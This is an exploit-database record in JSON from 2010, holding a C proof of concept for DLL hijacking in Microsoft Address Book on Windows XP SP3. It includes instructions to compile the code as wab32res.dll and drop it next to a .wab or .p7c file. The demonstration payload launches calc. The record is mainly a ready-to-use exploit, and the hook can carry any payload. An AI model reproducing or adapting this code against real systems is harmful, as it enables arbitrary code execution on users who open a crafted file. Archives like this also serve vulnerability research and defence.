Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit

{"type": "zdt", "lastseen": "2016-04-19T01:56:40", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit", "published": "2010-08-25T00:00:00", "href": "http://0day.today/exploit/description/13821", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for windows platform in category local exploits", "hash": "9858ff56f4fa0f3903ada948f2e555fff9216f3d753fb8dec6f9077e8c1ca7d5", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "===========================================================\r\nMicrosoft Address Book 6.00.2900.5512 DLL Hijacking Exploit\r\n===========================================================\r\n\r\n/*\r\n# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Anirban , Dinesh Arora\r\n# Site : www.beenuarora.com\r\n\r\nExploit Title: Microsoft Address Book DLL Hijacking\r\nDate: 25/08/2010\r\nAuthor: Beenu Arora\r\nTested on: Windows XP SP3 , Microsoft Address Book 6.00.2900.5512\r\nVulnerable extensions: wab , p7c\r\n\r\nCompile and rename to wab32res.dll, create a file in the same dir with one\r\nof the following extensions:\r\n.wab,p7c\r\n*/\r\n\r\n#include <windows.h>\r\n#define DLLIMPORT __declspec (dllexport)\r\n\r\nDLLIMPORT void hook_startup() { evil(); }\r\n\r\nint evil()\r\n{\r\n WinExec(\"calc\", 0);\r\n exit(0);\r\n return 0;\r\n}\r\n\r\n\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-13821", "sourceHref": "http://0day.today/exploit/13821", "modified": "2010-08-25T00:00:00", "reporter": "Beenu Arora", "enchantments": {"vulnersScore": 6.5}}